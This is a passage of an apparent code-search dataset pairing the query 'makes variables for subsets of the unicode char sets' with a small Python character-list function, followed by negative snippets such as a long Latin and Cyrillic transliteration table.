= i3 + 10\n assert i4 == w.size, str(i4) + ' ' + str(w.size)\n W1 = w[0:i1].reshape((n_hidden_units, 784))\n b1 = w[i1:i2]\n W2 = w[i2:i3].reshape((10, n_hidden_units))\n b2 = w[i3:i4]\n return W1, b1, W2, b2", "def constraint_sum(w):\n return sum(w) - 1", "def wsum_rvs(mu: np.ndarray, cov: np.ndarray, w: np.ndarray\n ) -> (np.ndarray, np.ndarray):\n mu1 = mu * w # type: np.ndarray\n ndim = mu1.ndim\n # not using axis=-1, to make it work with DataFrame and Series\n mu1 = mu1.sum(axis=ndim - 1)\n cov1 = (cov * (w[..., None] * w[..., None, :])\n ).sum(axis=ndim).sum(axis=ndim - 1)\n return mu1, cov1", "def _update_w(self, idx):\n self.w = ((self._w - 0.4) * (self._generations - idx)) /\\\n (self._generations + 0.4)", "def _derW(self, w, x, y, z):\n if _isscalar(w):\n w_pos = max(min(self.wSearchFunc(self.w_list, w), self.w_n - 1), 1)\n x_pos = max(min(self.xSearchFunc(self.x_list, x), self.x_n - 1), 1)\n y_pos = max(min(self.ySearchFunc(self.y_list, y), self.y_n - 1), 1)\n z_pos = max(min(self.zSearchFunc(self.z_list, z), self.z_n - 1), 1)\n else:\n w_pos = self.wSearchFunc(self.w_list, w)\n w_pos[w_pos < 1] = 1\n w_pos[w_pos > self.w_n - 1] = self.w_n - 1\n x_pos = self.xSearchFunc(self.x_list, x)\n x_pos[x_pos < 1] = 1\n x_pos[x_pos > self.x_n - 1] = self.x_n - 1\n y_pos = self.ySearchFunc(self.y_list, y)\n y_pos[y_pos < 1] = 
1\n y_pos[y_pos > self.y_n - 1] = self.y_n - 1\n z_pos = self.zSearchFunc(self.z_list, z)\n z_pos[z_pos < 1] = 1\n z_pos[z_pos > self.z_n - 1] = self.z_n - 1\n i = w_pos # for convenience\n j = x_pos\n k = y_pos\n l = z_pos\n beta = (x - self.x_list[j - 1]) / (self.x_list[j] - self.x_list[j - 1])\n gamma = (y - self.y_list[k - 1]) / (self.y_list[k] - self.y_list[k - 1])\n delta = (z - self.z_list[l - 1]) / (self.z_list[l] - self.z_list[l - 1])\n dfdw = (\n (\n (1 - beta)\n * (1 - gamma)\n * (1 - delta)\n * self.f_values[i, j - 1, k - 1, l - 1]\n + (1 - beta) * (1 - gamma) * delta * self.f_values[i, j - 1, k - 1, l]\n + (1 - beta) * gamma * (1 - delta) * self.f_values[i, j - 1, k, l - 1]\n + (1 - beta) * gamma * delta * self.f_values[i, j - 1, k, l]\n + beta * (1 - gamma) * (1 - delta) * self.f_values[i, j, k - 1, l - 1]\n + beta * (1 - gamma) * delta * self.f_values[i, j, k - 1, l]\n + beta * gamma * (1 - delta) * self.f_values[i, j, k, l - 1]\n + beta * gamma * delta * self.f_values[i, j, k, l]\n )\n - (\n (1 - beta)\n * (1 - gamma)\n * (1 - delta)\n * self.f_values[i - 1, j - 1, k - 1, l - 1]\n + (1 - beta)\n * (1 - gamma)\n * delta\n * self.f_values[i - 1, j - 1, k - 1, l]\n + (1 - beta)\n * gamma\n * (1 - delta)\n * self.f_values[i - 1, j - 1, k, l - 1]\n + (1 - beta) * gamma * delta * self.f_values[i - 1, j - 1, k, l]\n + beta\n * (1 - gamma)\n * (1 - delta)\n * self.f_values[i - 1, j, k - 1, l - 1]\n + beta * (1 - gamma) * delta * self.f_values[i - 1, j, k - 1, l]\n + beta * gamma * (1 - delta) * self.f_values[i - 1, j, k, l - 1]\n + beta * gamma * delta * self.f_values[i - 1, j, k, l]\n )\n ) / (self.w_list[i] - self.w_list[i - 1])\n return dfdw", "def subtract(v: Vector, w: Vector) -> Vector:\n assert len(v) == len(w), 'both vectors must have the same length'\n\n return [v_item - w_item for v_item, w_item in zip(v, w)]", "def u_update(eta_0, eta, eta_lin, w_0, w, w_lin, eta_T_H_L_stacked, premultiplied_lhs = None, nnls_max_iter=50): \n # PREMULTIPLIED LHS IS AN EXTRA ARGUMENT! Set it to None and add solver! 
\n \"\"\"In the following +[[]] and [:-1] are added to keep thing 1dim array of objects and still multiply it elemtwisely\"\"\" \n# #B.append([]) #THIS IS WRONG, CHANGES THE LIST \n# B_concat = np.concatenate((1/np.sqrt(2*eta))*np.array(B+[[]])[:-1], axis = 0) \n# A_ls = np.concatenate([(1/np.sqrt(2*eta0))*A, B_concat], axis = 0) \n# #print(np.array(B).shape) \n# #print(w[0].shape) \n# #print(w, eta) \n# #w.append([]) THIS IS WRONG, CHANGES THE LIST \n# w_concat = np.concatenate((1/np.sqrt(2*eta))*np.array(w+[[]])[:-1], axis = 0) #[:-1] Added as a hack to keep it one-dim array of objects \n# eta_w = np.expand_dims(1/np.sqrt(2*eta),1)*np.array(w) \n# print(eta_w.shape) \n# b_ls = np.concatenate([(1/np.sqrt(2*eta_0))*w_0, eta_w.flatten()], axis = 0) \n #Use correct broadcasting?\n w_concat = np.concatenate((1/np.sqrt(2*eta))*np.array(w+[[]])[:-1], axis = 0) #[:-1] Added as a hack to keep it one-dim array of objects \n b_ls = np.concatenate([(1/np.sqrt(2*eta_0))*w_0, w_concat, (1/np.sqrt(2*eta_lin))*w_lin], axis = 0) \n# print(np.sum(eta_w.flatten() != w_concat)) \n# premultiplied_time_start = time.time() \n# premultiplied_lhs = eta_T_H_stacked.T.dot(eta_T_H_stacked).toarray() \n# premultiplied_time_end = time.time() \n# print('premultiplying took {}'.format(premultiplied_time_end - premultiplied_time_start)) \n# premultiplied_rhs = eta_T_H_stacked.T.dot(b_ls) \n# u_next = nnls_predotted(premultiplied_lhs, premultiplied_rhs, tol=1e-5) \n# print(eta_T_H_stacked.shape, b_ls.shape) \n# A_ls_t_b = eta_T_H_stacked.T.dot(b_ls) \n# w =scipy.sparse.linalg.spsolve_triangular(RT, A_ls_t_b, lower = True) \n# x = scipy.sparse.linalg.spsolve_triangular(R, w, lower = False) \n# u_next = x \n u_next = scipy.optimize.lsq_linear(eta_T_H_L_stacked, b_ls, bounds = (0, np.inf), tol=1e-3, lsmr_tol=1e-3, max_iter=nnls_max_iter, verbose=1).x \n# u = scipy.optimize.lsq_linear(premultiplied_lhs, premultiplied_rhs, bounds = (0, np.inf), tol=1e-5).x \n return u_next", "def lca(self, v, w):", "def __add__(self, v):\n return vector(self.x + v.x, self.y + v.y, self.z + v.z)", "def squared_distance(v, w):\n return sum_of_squares(vector_subtract(v, w))", "def u_weights(self):\n for i in range(self.n_inputs):\n self._q_neuron.cx(self._weights[i], self.inputs[i])", "def resmlp(self, x, w3, w2, b2, w, b):\r\n return tf.matmul(tf.nn.tanh(tf.matmul(x, w2) + b2), w) + tf.matmul(x,\r\n w3) + b", "def squared_distance(v, w):\n return sum_of_squares(vector_subtraction(v, w))", "def _create_weight_update_ops(self):\n with tf.name_scope(\"Weight_Update_Operators\"):\n self.weight_vars_assign_ops = []\n for weight_matrix, grad in zip(self._train_vars, self.step_direction_variables):\n self.weight_vars_assign_ops.append(\n tf.assign_add(weight_matrix, self._step_on_line_plh * -grad / self.norm_of_gradient_var).op)", "def forward(self, w_value, x1_value, x2_value, b_value):\n self.inputs = [w_value, x1_value, x2_value, b_value]\n\n x_input = np.asarray([x1_value, x2_value]).T\n # return np.matmul(x_value, w_value) + b_value # [Note] Matmul Order\n return x_input.dot(w_value) + b_value # [Note] Matmul Order", "def _assemble_W(self):\n L = torch.tril(self.L, diagonal=-1) + torch.diag(torch.ones(self.dim))\n U = torch.triu(self.U, diagonal=1)\n W = self.P @ L @ (U + torch.diag(self.S))\n return W", "def objective(V, W, h):\n return np.linalg.norm(v - w @ h, ord = 'fro')", "def objective(self,w):\n diffs = self.get_y_times_diffs(self.get_split_weights(w))\n #print diffs, sigmoid(diffs)\n obj = -np.sum(np.log(sigmoid(diffs))) #negative, since 
minimising\n # regularisation\n obj += 0.5 * self.alpha * np.dot(w[:self.interp_index[0]], w[:self.interp_index[0]])\n return obj", "def _compute_gradients(self, v0, prob_h_v0, vk, prob_h_vk):\n outer_product0 = tf.matmul(tf.transpose(v0), prob_h_v0)\n outer_productk = tf.matmul(tf.transpose(vk), prob_h_vk)\n W_grad = tf.reduce_mean(outer_product0 - outer_productk, axis=0)\n a_grad = tf.reduce_mean(v0 - vk, axis=0)\n b_grad = tf.reduce_mean(prob_h_v0 - prob_h_vk, axis=0)\n return W_grad, a_grad, b_grad" ]
[ "0.70978653", "0.70766723", "0.70762354", "0.65042007", "0.6414303", "0.63884014", "0.63861686", "0.63567185", "0.63381374", "0.63309324", "0.6324586", "0.62767076", "0.6206558", "0.617885", "0.608573", "0.6083657", "0.6048553", "0.6001456", "0.5981003", "0.59767973", "0.5976543", "0.59530234", "0.5921166", "0.58645374", "0.5852599", "0.58505607", "0.5838608", "0.5834272", "0.5834272", "0.5834272", "0.58214307", "0.58200586", "0.5808356", "0.5805838", "0.57981956", "0.57900196", "0.5779251", "0.57718694", "0.57703424", "0.5768552", "0.5756273", "0.5729984", "0.56744534", "0.5667315", "0.5661385", "0.5660248", "0.5655894", "0.564382", "0.56416786", "0.56357795", "0.56338733", "0.5603762", "0.56012905", "0.55924743", "0.55881494", "0.5586469", "0.5581144", "0.5574224", "0.55485106", "0.55443454", "0.55413777", "0.5537324", "0.5533671", "0.5527606", "0.55178607", "0.55166304", "0.55093527", "0.55062443", "0.54979396", "0.5493674", "0.5487183", "0.5482378", "0.54817474", "0.54648054", "0.54441905", "0.54432404", "0.5433706", "0.5428752", "0.5425314", "0.54112196", "0.54100436", "0.5406896", "0.540455", "0.5398901", "0.5397609", "0.53954244", "0.5395007", "0.5393957", "0.5386058", "0.53727317", "0.5368272", "0.5366069", "0.53639495", "0.53476936", "0.5345559", "0.53453356" ]
0.6353202
12
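The first record ends here. Its document field reduces to a single live call, `scipy.optimize.lsq_linear` with a nonnegativity bound, surrounded by commented-out alternatives (premultiplied normal equations, triangular solves). For orientation, a minimal runnable sketch of that pattern follows; the block matrices, right-hand sides, and `eta` weights are illustrative assumptions, not values recovered from the record.

```python
import numpy as np
import scipy.optimize

# Illustrative stand-ins (assumptions): two weighted blocks stacked into one
# least-squares system, mirroring the eta_T_H_L_stacked / b_ls construction
# in the record's document field.
rng = np.random.default_rng(0)
A0, A1 = rng.standard_normal((20, 5)), rng.standard_normal((30, 5))
b0, b1 = rng.standard_normal(20), rng.standard_normal(30)
eta0, eta1 = 0.5, 2.0  # per-block weights (hypothetical values)

# Each block is scaled by 1/sqrt(2*eta), then the blocks are stacked row-wise.
A_ls = np.concatenate([A0 / np.sqrt(2 * eta0), A1 / np.sqrt(2 * eta1)], axis=0)
b_ls = np.concatenate([b0 / np.sqrt(2 * eta0), b1 / np.sqrt(2 * eta1)], axis=0)

# Nonnegative least squares via a bounded solver, as in the document above.
res = scipy.optimize.lsq_linear(A_ls, b_ls, bounds=(0, np.inf),
                                tol=1e-3, max_iter=100)
u_next = res.x
assert (u_next >= 0).all()  # the solver keeps the solution within bounds
```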
makes variables for subsets of the unicode char sets
def assignCharacters(otherChars, where):\n    if(isinstance(otherChars, list)):\n        where.append(otherChars)\n    if(isinstance(otherChars, str)):\n        tmp = \" \".join(otherChars).split()\n        where.append(tmp)
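To make this document snippet concrete: for a string input, `" ".join(otherChars)` interleaves spaces between the characters and `.split()` then yields the list of its non-whitespace characters, while a list input is appended unchanged. A small hypothetical driver (the inputs are made up, not part of the record):

```python
def assignCharacters(otherChars, where):
    # Append a character subset to `where`: lists as-is, strings exploded
    # into their non-whitespace characters.
    if isinstance(otherChars, list):
        where.append(otherChars)
    if isinstance(otherChars, str):
        # " ".join("abc") -> "a b c"; .split() -> ["a", "b", "c"]
        tmp = " ".join(otherChars).split()
        where.append(tmp)

subsets = []
assignCharacters("abc", subsets)             # string -> list of characters
assignCharacters(["ä", "ö", "ü"], subsets)   # list appended unchanged
print(subsets)  # [['a', 'b', 'c'], ['ä', 'ö', 'ü']]
```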
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _characters(self):\n self.characters = list(\n set([item for sublist in self.grid for item in sublist])\n )\n return self.characters", "def unique_characters(self):\n charset = set()\n for doc in self.docs.values():\n charset |= set(doc)\n\n return charset", "def make_unicode():\r\n for num in range(300, 320):\r\n yield unichr(num)", "def test_unicodeCombining(self):\n input = raw_unicode(\n r\"Ik ben gei\\u0308nteresseerd in de co\\u00F6rdinatie van mijn knie\\u00EBn, maar kan niet e\\u0301e\\u0301n \\u00E0 twee enqu\\u00EAtes vinden die recht doet aan mijn carri\\u00E8re op Cura\\u00E7ao\")\n output = input.split(\" \")\n output[8] = output[8][0:-1]\n for (itmO, itmV) in zip(output, tokenize_en(input)):\n self.assertEqual(itmO, itmV[0])\n self.assertTrue(input[itmV[1]:].startswith(itmO))", "def init_characters( self ):\n self.characters = {}\n for i in range( 0, 255+1 ):\n self.face.load_char( chr(i), FT_LOAD_RENDER | FT_LOAD_TARGET_MONO )\n glyphslot = self.face.glyph\n self.glyphs[i] = glyphslot # keep reference to the glyphslot\n self.characters[ i ] = GlyphDecoder.from_glyphslot( glyphslot ).bitmap", "def get_char_vocab(datasets, chars_lowercase=False):\n vocab_char = set()\n for dataset in datasets:\n for _, words, _ in dataset:\n for word in words:\n if chars_lowercase:\n word = word.lower()\n vocab_char.update(word)\n\n return vocab_char", "def __init__(self, encoding):\n self.trans = {}\n for char in u\"ÀÁÂẦẤẪẨẬÃĀĂẰẮẴẶẲȦǠẠḀȂĄǍẢ\":\n self.trans[char] = u\"A\"\n for char in u\"ȀǞ\":\n self.trans[char] = u\"Ä\"\n self.trans[u\"Ǻ\"] = u\"Å\"\n self.trans[u\"Ä\"] = u\"Ae\"\n self.trans[u\"Å\"] = u\"Aa\"\n for char in u\"àáâầấẫẩậãāăằắẵặẳȧǡạḁȃąǎảẚ\":\n self.trans[char] = u\"a\"\n for char in u\"ȁǟ\":\n self.trans[char] = u\"ä\"\n self.trans[u\"ǻ\"] = u\"å\"\n self.trans[u\"ä\"] = u\"ae\"\n self.trans[u\"å\"] = u\"aa\"\n for char in u\"ḂḄḆƁƂ\":\n self.trans[char] = u\"B\"\n for char in u\"ḃḅḇƀɓƃ\":\n self.trans[char] = u\"b\"\n for char in u\"ĆĈĊÇČƇ\":\n self.trans[char] = u\"C\"\n for char in u\"ćĉċçčƈȼ\":\n self.trans[char] = u\"c\"\n self.trans[u\"Ḉ\"] = u\"Ç\"\n self.trans[u\"ḉ\"] = u\"ç\"\n self.trans[u\"Ð\"] = u\"Dh\"\n self.trans[u\"ð\"] = u\"dh\"\n for char in u\"ĎḊḌḎḐḒĐƉƊƋ\":\n self.trans[char] = u\"D\"\n for char in u\"ďḋḍḏḑḓđɖɗƌ\":\n self.trans[char] = u\"d\"\n for char in u\"ÈȄÉÊḚËĒḔḖĔĖẸE̩ȆȨḜĘĚẼḘẺ\":\n self.trans[char] = u\"E\"\n for char in u\"ỀẾỄỆỂ\":\n self.trans[char] = u\"Ê\"\n for char in u\"èȅéêḛëēḕḗĕėẹe̩ȇȩḝęěẽḙẻ\":\n self.trans[char] = u\"e\"\n for char in u\"ềếễệể\":\n self.trans[char] = u\"ê\"\n for char in u\"ḞƑ\":\n self.trans[char] = u\"F\"\n for char in u\"ḟƒ\":\n self.trans[char] = u\"f\"\n for char in u\"ǴḠĞĠĢǦǤƓ\":\n self.trans[char] = u\"G\"\n for char in u\"ǵḡğġģǧǥɠ\":\n self.trans[char] = u\"g\"\n self.trans[u\"Ĝ\"] = u\"Gx\"\n self.trans[u\"ĝ\"] = u\"gx\"\n for char in u\"ḢḤḦȞḨḪH̱ĦǶ\":\n self.trans[char] = u\"H\"\n for char in u\"ḣḥḧȟḩḫ̱ẖħƕ\":\n self.trans[char] = u\"h\"\n for char in u\"IÌȈÍÎĨḬÏḮĪĬȊĮǏİỊỈƗ\":\n self.trans[char] = u\"I\"\n for char in u\"ıìȉíîĩḭïḯīĭȋįǐiịỉɨ\":\n self.trans[char] = u\"i\"\n for char in u\"ĴJ\":\n self.trans[char] = u\"J\"\n for char in u\"ɟĵ̌ǰ\":\n self.trans[char] = u\"j\"\n for char in u\"ḰǨĶḲḴƘ\":\n self.trans[char] = u\"K\"\n for char in u\"ḱǩķḳḵƙ\":\n self.trans[char] = u\"k\"\n for char in u\"ĹĻĽḶḸḺḼȽŁ\":\n self.trans[char] = u\"L\"\n for char in u\"ĺļľḷḹḻḽƚłɫ\":\n self.trans[char] = u\"l\"\n for char in u\"ḾṀṂ\":\n self.trans[char] = u\"M\"\n for char in u\"ḿṁṃɱ\":\n self.trans[char] = u\"m\"\n for char in 
u\"ǸŃÑŅŇṄṆṈṊŊƝɲȠ\":\n self.trans[char] = u\"N\"\n for char in u\"ǹńñņňṅṇṉṋŋɲƞ\":\n self.trans[char] = u\"n\"\n for char in u\"ÒÓÔÕṌṎȬÖŌṐṒŎǑȮȰỌǪǬƠỜỚỠỢỞỎƟØǾ\":\n self.trans[char] = u\"O\"\n for char in u\"òóôõṍṏȭöōṑṓŏǒȯȱọǫǭơờớỡợởỏɵøǿ\":\n self.trans[char] = u\"o\"\n for char in u\"ȌŐȪ\":\n self.trans[char] = u\"Ö\"\n for char in u\"ȍőȫ\":\n self.trans[char] = u\"ö\"\n for char in u\"ỒỐỖỘỔȎ\":\n self.trans[char] = u\"Ô\"\n for char in u\"ồốỗộổȏ\":\n self.trans[char] = u\"ô\"\n for char in u\"ṔṖƤ\":\n self.trans[char] = u\"P\"\n for char in u\"ṕṗƥ\":\n self.trans[char] = u\"p\"\n self.trans[u\"ᵽ\"] = u\"q\"\n for char in u\"ȐŔŖŘȒṘṚṜṞ\":\n self.trans[char] = u\"R\"\n for char in u\"ȑŕŗřȓṙṛṝṟɽ\":\n self.trans[char] = u\"r\"\n for char in u\"ŚṤŞȘŠṦṠṢṨ\":\n self.trans[char] = u\"S\"\n for char in u\"śṥşșšṧṡṣṩȿ\":\n self.trans[char] = u\"s\"\n self.trans[u\"Ŝ\"] = u\"Sx\"\n self.trans[u\"ŝ\"] = u\"sx\"\n for char in u\"ŢȚŤṪṬṮṰŦƬƮ\":\n self.trans[char] = u\"T\"\n for char in u\"ţțťṫṭṯṱŧȾƭʈ\":\n self.trans[char] = u\"t\"\n for char in u\"ÙÚŨṸṴÜṲŪṺŬỤŮŲǓṶỦƯỮỰỬ\":\n self.trans[char] = u\"U\"\n for char in u\"ùúũṹṵüṳūṻŭụůųǔṷủưữựửʉ\":\n self.trans[char] = u\"u\"\n for char in u\"ȔŰǛǗǕǙ\":\n self.trans[char] = u\"Ü\"\n for char in u\"ȕűǜǘǖǚ\":\n self.trans[char] = u\"ü\"\n self.trans[u\"Û\"] = u\"Ux\"\n self.trans[u\"û\"] = u\"ux\"\n self.trans[u\"Ȗ\"] = u\"Û\"\n self.trans[u\"ȗ\"] = u\"û\"\n self.trans[u\"Ừ\"] = u\"Ù\"\n self.trans[u\"ừ\"] = u\"ù\"\n self.trans[u\"Ứ\"] = u\"Ú\"\n self.trans[u\"ứ\"] = u\"ú\"\n for char in u\"ṼṾ\":\n self.trans[char] = u\"V\"\n for char in u\"ṽṿ\":\n self.trans[char] = u\"v\"\n for char in u\"ẀẂŴẄẆẈ\":\n self.trans[char] = u\"W\"\n for char in u\"ẁẃŵẅẇẉ\":\n self.trans[char] = u\"w\"\n for char in u\"ẊẌ\":\n self.trans[char] = u\"X\"\n for char in u\"ẋẍ\":\n self.trans[char] = u\"x\"\n for char in u\"ỲÝŶŸỸȲẎỴỶƳ\":\n self.trans[char] = u\"Y\"\n for char in u\"ỳýŷÿỹȳẏỵỷƴ\":\n self.trans[char] = u\"y\"\n for char in u\"ŹẐŻẒŽẔƵȤ\":\n self.trans[char] = u\"Z\"\n for char in u\"źẑżẓžẕƶȥ\":\n self.trans[char] = u\"z\"\n self.trans[u\"ɀ\"] = u\"zv\"\n\n # Latin: extended Latin alphabet\n self.trans[u\"ɑ\"] = u\"a\"\n for char in u\"ÆǼǢ\":\n self.trans[char] = u\"AE\"\n for char in u\"æǽǣ\":\n self.trans[char] = u\"ae\"\n self.trans[u\"Ð\"] = u\"Dh\"\n self.trans[u\"ð\"] = u\"dh\"\n for char in u\"ƎƏƐ\":\n self.trans[char] = u\"E\"\n for char in u\"ǝəɛ\":\n self.trans[char] = u\"e\"\n for char in u\"ƔƢ\":\n self.trans[char] = u\"G\"\n for char in u\"ᵷɣƣᵹ\":\n self.trans[char] = u\"g\"\n self.trans[u\"Ƅ\"] = u\"H\"\n self.trans[u\"ƅ\"] = u\"h\"\n self.trans[u\"Ƕ\"] = u\"Wh\"\n self.trans[u\"ƕ\"] = u\"wh\"\n self.trans[u\"Ɩ\"] = u\"I\"\n self.trans[u\"ɩ\"] = u\"i\"\n self.trans[u\"Ŋ\"] = u\"Ng\"\n self.trans[u\"ŋ\"] = u\"ng\"\n self.trans[u\"Œ\"] = u\"OE\"\n self.trans[u\"œ\"] = u\"oe\"\n self.trans[u\"Ɔ\"] = u\"O\"\n self.trans[u\"ɔ\"] = u\"o\"\n self.trans[u\"Ȣ\"] = u\"Ou\"\n self.trans[u\"ȣ\"] = u\"ou\"\n self.trans[u\"Ƽ\"] = u\"Q\"\n for char in u\"ĸƽ\":\n self.trans[char] = u\"q\"\n self.trans[u\"ȹ\"] = u\"qp\"\n self.trans[u\"\"] = u\"r\"\n self.trans[u\"ſ\"] = u\"s\"\n self.trans[u\"ß\"] = u\"ss\"\n self.trans[u\"Ʃ\"] = u\"Sh\"\n for char in u\"ʃᶋ\":\n self.trans[char] = u\"sh\"\n self.trans[u\"Ʉ\"] = u\"U\"\n self.trans[u\"ʉ\"] = u\"u\"\n self.trans[u\"Ʌ\"] = u\"V\"\n self.trans[u\"ʌ\"] = u\"v\"\n for char in u\"ƜǷ\":\n self.trans[char] = u\"W\"\n for char in u\"ɯƿ\":\n self.trans[char] = u\"w\"\n self.trans[u\"Ȝ\"] = u\"Y\"\n self.trans[u\"ȝ\"] = u\"y\"\n self.trans[u\"IJ\"] 
= u\"IJ\"\n self.trans[u\"ij\"] = u\"ij\"\n self.trans[u\"Ƨ\"] = u\"Z\"\n for char in u\"ʮƨ\":\n self.trans[char] = u\"z\"\n self.trans[u\"Ʒ\"] = u\"Zh\"\n self.trans[u\"ʒ\"] = u\"zh\"\n self.trans[u\"Ǯ\"] = u\"Dzh\"\n self.trans[u\"ǯ\"] = u\"dzh\"\n for char in u\"ƸƹʔˀɁɂ\":\n self.trans[char] = u\"'\"\n self.trans['Þ'] = 'Th'\n self.trans['þ'] = 'th'\n for char in u\"Cʗǃ\":\n self.trans[char] = u\"!\"\n\n # Punctuation and typography\n for char in u\"«»“”„¨\":\n self.trans[char] = u'\"'\n for char in u\"‘’′\":\n self.trans[char] = u\"'\"\n self.trans[u\"•\"] = u\"*\"\n self.trans[u\"@\"] = u\"(at)\"\n self.trans[u\"¤\"] = u\"$\"\n self.trans[u\"¢\"] = u\"c\"\n self.trans[u\"€\"] = u\"E\"\n self.trans[u\"£\"] = u\"L\"\n self.trans[u\"¥\"] = u\"yen\"\n self.trans[u\"†\"] = u\"+\"\n self.trans[u\"‡\"] = u\"++\"\n self.trans[u\"°\"] = u\":\"\n self.trans[u\"¡\"] = u\"!\"\n self.trans[u\"¿\"] = u\"?\"\n self.trans[u\"‰\"] = u\"o/oo\"\n self.trans[u\"‱\"] = u\"o/ooo\"\n for char in u\"¶§\":\n self.trans[char] = u\">\"\n self.trans['…'] = '...'\n for char in u\"‒–—―\":\n self.trans[char] = u\"-\"\n self.trans['·'] = ' '\n self.trans[u\"¦\"] = u\"|\"\n self.trans[u\"⁂\"] = u\"***\"\n self.trans[u\"◊\"] = u\"<>\"\n self.trans[u\"‽\"] = u\"?!\"\n self.trans[u\"؟\"] = u\";-)\"\n self.trans[u\"¹\"] = u\"1\"\n self.trans[u\"²\"] = u\"2\"\n self.trans[u\"³\"] = u\"3\"\n\n # Cyrillic\n self.trans.update({u\"А\": u\"A\", u\"а\": u\"a\", u\"Б\": u\"B\", u\"б\": u\"b\",\n u\"В\": u\"V\", u\"в\": u\"v\", u\"Г\": u\"G\", u\"г\": u\"g\",\n u\"Д\": u\"D\", u\"д\": u\"d\", u\"Е\": u\"E\", u\"е\": u\"e\",\n u\"Ж\": u\"Zh\", u\"ж\": u\"zh\", u\"З\": u\"Z\", u\"з\": u\"z\",\n u\"И\": u\"I\", u\"и\": u\"i\", u\"Й\": u\"J\", u\"й\": u\"j\",\n u\"К\": u\"K\", u\"к\": u\"k\", u\"Л\": u\"L\", u\"л\": u\"l\",\n u\"М\": u\"M\", u\"м\": u\"m\", u\"Н\": u\"N\", u\"н\": u\"n\",\n u\"О\": u\"O\", u\"о\": u\"o\", u\"П\": u\"P\", u\"п\": u\"p\",\n u\"Р\": u\"R\", u\"р\": u\"r\", u\"С\": u\"S\", u\"с\": u\"s\",\n u\"Т\": u\"T\", u\"т\": u\"t\", u\"У\": u\"U\", u\"у\": u\"u\",\n u\"Ф\": u\"F\", u\"ф\": u\"f\", u\"х\": u\"kh\", u\"Ц\": u\"C\",\n u\"ц\": u\"c\", u\"Ч\": u\"Ch\", u\"ч\": u\"ch\", u\"Ш\": u\"Sh\",\n u\"ш\": u\"sh\", u\"Щ\": u\"Shch\", u\"щ\": u\"shch\", u\"Ь\": u\"'\",\n u\"ь\": \"'\", u\"Ъ\": u'\"', u\"ъ\": '\"', u\"Ю\": u\"Yu\",\n u\"ю\": u\"yu\", u\"Я\": u\"Ya\", u\"я\": u\"ya\", u\"Х\": u\"Kh\",\n u\"Χ\": u\"Kh\"})\n\n # Additional Cyrillic letters, most occuring in only one or a few languages\n self.trans.update({u\"Ы\": u\"Y\", u\"ы\": u\"y\", u\"Ё\": u\"Ë\", u\"ё\": u\"ë\",\n u\"Э\": u\"È\", u\"Ѐ\": u\"È\", u\"э\": u\"è\", u\"ѐ\": u\"è\",\n u\"І\": u\"I\", u\"і\": u\"i\", u\"Ї\": u\"Ji\", u\"ї\": u\"ji\",\n u\"Є\": u\"Je\", u\"є\": u\"je\", u\"Ґ\": u\"G\", u\"Ҝ\": u\"G\",\n u\"ґ\": u\"g\", u\"ҝ\": u\"g\", u\"Ђ\": u\"Dj\", u\"ђ\": u\"dj\",\n \"Љ\": \"Lj\", \"љ\": \"lj\",\n u\"Њ\": u\"Nj\", u\"њ\": u\"nj\", u\"Ћ\": u\"Cj\", u\"ћ\": u\"cj\",\n 'Җ': 'Zhj', 'Ѓ': 'Gj', 'ѓ': 'gj',\n u\"Ќ\": u\"Kj\", u\"ќ\": u\"kj\", u\"Ӣ\": u\"Ii\", u\"ӣ\": u\"ii\",\n \"Ҳ\": \"H\", \"ҳ\": \"h\",\n u\"Ҷ\": u\"Dz\", u\"ҷ\": u\"dz\", u\"Ө\": u\"Ô\", u\"Ӫ\": u\"Ô\",\n u\"ө\": u\"ô\", u\"ӫ\": u\"ô\", u\"Ү\": u\"Y\", u\"ү\": u\"y\", u\"Һ\": u\"H\",\n u\"һ\": u\"h\", u\"Ә\": u\"AE\", u\"Ӕ\": u\"AE\", u\"ә\": u\"ae\",\n 'Ӛ': 'Ë', 'Ӭ': 'Ë', 'ӛ': 'ë', 'ӭ': 'ë',\n 'җ': 'zhj', 'Ұ': 'U', 'ў': 'ù', 'Ў': 'Ù',\n u\"ѝ\": u\"ì\", u\"Ѝ\": u\"Ì\", u\"Ӑ\": u\"A\", u\"ă\": u\"a\", u\"Ӓ\": u\"Ä\",\n \"Ҽ\": \"Ts\", \"Ҿ\": \"Ts\", \"ҽ\": \"ts\", \"ҿ\": 
\"ts\",\n u\"Ҙ\": u\"Dh\", u\"ҙ\": u\"dh\", u\"Ӏ\": u\"\", u\"ӏ\": u\"\", u\"Ӆ\": u\"L\",\n u\"ӆ\": u\"l\", u\"Ӎ\": u\"M\", u\"ӎ\": u\"m\", u\"Ӧ\": u\"Ö\", u\"ӧ\": u\"ö\",\n u\"Ҩ\": u\"u\", u\"ҩ\": u\"u\", u\"Ҧ\": u\"Ph\", u\"ҧ\": u\"ph\", u\"Ҏ\": u\"R\",\n u\"ҏ\": u\"r\", u\"Ҫ\": u\"Th\", u\"ҫ\": u\"th\", u\"Ҭ\": u\"T\", u\"ҭ\": u\"t\",\n 'Ӯ': 'Û', 'ӯ': 'û', 'Ӹ': 'U', 'ұ': 'u',\n u\"ӹ\": u\"u\", u\"Ҵ\": u\"Tts\", u\"ҵ\": u\"tts\", u\"Ӵ\": u\"Ch\", u\"ӵ\": u\"ch\"})\n\n for char in u\"ЈӤҊ\":\n self.trans[char] = u\"J\"\n for char in u\"јӥҋ\":\n self.trans[char] = u\"j\"\n for char in u\"ЏӁӜҶ\":\n self.trans[char] = u\"Dzh\"\n for char in u\"џӂӝҷ\":\n self.trans[char] = u\"dzh\"\n for char in u\"ЅӞӠӋҸ\":\n self.trans[char] = u\"Dz\"\n for char in u\"ѕӟӡӌҹ\":\n self.trans[char] = u\"dz\"\n for char in u\"ҒӶҔ\":\n self.trans[char] = u\"G\"\n for char in u\"ғӷҕ\":\n self.trans[char] = u\"g\"\n for char in u\"ҚҞҠӃ\":\n self.trans[char] = u\"Q\"\n for char in u\"қҟҡӄ\":\n self.trans[char] = u\"q\"\n for char in u\"ҢҤӉӇ\":\n self.trans[char] = u\"Ng\"\n for char in u\"ңҥӊӈ\":\n self.trans[char] = u\"ng\"\n for char in u\"ӖѢҌ\":\n self.trans[char] = u\"E\"\n for char in u\"ӗѣҍ\":\n self.trans[char] = u\"e\"\n for char in u\"ӲӰҮ\":\n self.trans[char] = u\"Ü\"\n for char in u\"ӳӱү\":\n self.trans[char] = u\"ü\"\n\n # Archaic Cyrillic letters\n self.trans.update({u\"Ѹ\": u\"Ou\", u\"ѹ\": u\"ou\", u\"Ѡ\": u\"O\", u\"Ѻ\": u\"O\", u\"ѡ\": 